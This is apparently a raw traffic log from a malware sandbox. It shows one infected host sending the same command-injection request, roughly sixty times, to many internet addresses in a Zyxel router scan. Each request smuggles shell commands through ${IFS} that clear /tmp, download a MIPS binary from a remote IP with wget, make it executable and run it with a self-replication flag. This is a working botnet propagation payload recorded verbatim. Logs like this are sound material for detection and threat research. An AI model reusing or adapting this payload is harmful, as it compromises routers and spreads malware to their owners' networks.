                                    Jan 13, 2024 19:02:21.890492916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1452192.168.2.1350710223.127.17.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890544891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1453192.168.2.1351866142.151.194.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890589952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1454192.168.2.1342708169.163.49.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890646935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1455192.168.2.1346948143.210.165.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890671015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1456192.168.2.1344066147.114.0.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890707016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1457192.168.2.135606459.106.248.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890769958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1458192.168.2.1357506101.152.22.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890801907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1459192.168.2.1351164174.120.144.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890829086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1460192.168.2.1354646207.240.78.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890873909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1461192.168.2.1339130213.30.183.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890913963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1462192.168.2.134779269.154.84.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.890958071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1463192.168.2.1360834119.40.185.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891007900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1464192.168.2.1339070192.63.152.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891047001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1465192.168.2.1339254110.149.139.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891072035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1466192.168.2.1352862148.18.156.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891120911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1467192.168.2.1344442183.199.241.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891148090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1468192.168.2.1358482197.18.75.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891196966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1469192.168.2.1334976138.78.160.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891206026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1470192.168.2.1332946190.190.55.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891256094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1471192.168.2.1338488110.27.237.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891287088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1472192.168.2.1347850218.62.241.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891316891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1473192.168.2.1353080139.119.42.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891359091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1474192.168.2.1346208160.85.58.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891405106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1475192.168.2.1340028194.246.143.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891431093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1476192.168.2.1360468153.58.63.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891489029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1477192.168.2.134784640.234.169.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891530991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1478192.168.2.1345066169.225.143.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891570091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1479192.168.2.1348120209.219.32.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891594887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1480192.168.2.134510220.136.113.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891644001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1481192.168.2.1333566139.161.249.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891674995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1482192.168.2.135032648.19.140.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891704082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1483192.168.2.1358930213.22.126.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891729116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1484192.168.2.1335478106.221.242.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891755104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1485192.168.2.1338024168.235.110.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891794920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1486192.168.2.13463448.184.197.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891819000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1487192.168.2.1354998178.126.7.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891844988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1488192.168.2.134817661.41.150.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891896009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1489192.168.2.134236666.30.229.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891927004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1490192.168.2.134686224.18.99.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891963005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1491192.168.2.1347538109.102.213.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.891993046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1492192.168.2.1354034150.123.243.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.892015934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1493192.168.2.13408828.83.80.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898541927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1494192.168.2.1340792121.135.115.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898591995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1495192.168.2.1351608223.252.173.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898605108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1496192.168.2.1359240115.200.82.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898633957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1497192.168.2.1340466118.159.151.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898673058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1498192.168.2.1339878197.194.85.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898725986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1499192.168.2.1351402222.210.13.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898772955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1500192.168.2.1359918154.136.163.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898799896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1501192.168.2.133335217.92.204.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898837090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1502192.168.2.136096470.185.228.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898864985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1503192.168.2.134303695.182.254.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898905039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1504192.168.2.1342972115.159.23.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898935080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1505192.168.2.135988060.51.165.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.898983002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1506192.168.2.135172623.140.128.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899019003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1507192.168.2.133788868.65.4.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899044037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1508192.168.2.1350748207.254.190.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899082899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1509192.168.2.1337796131.13.228.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899125099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1510192.168.2.133349040.88.64.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899173021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1511192.168.2.1347864155.247.3.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899208069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1512192.168.2.1339822129.177.122.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899235964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1513192.168.2.135793664.230.115.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.899276018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1514192.168.2.135729419.125.25.5443
                                    TimestampBytes transferredDirectionData
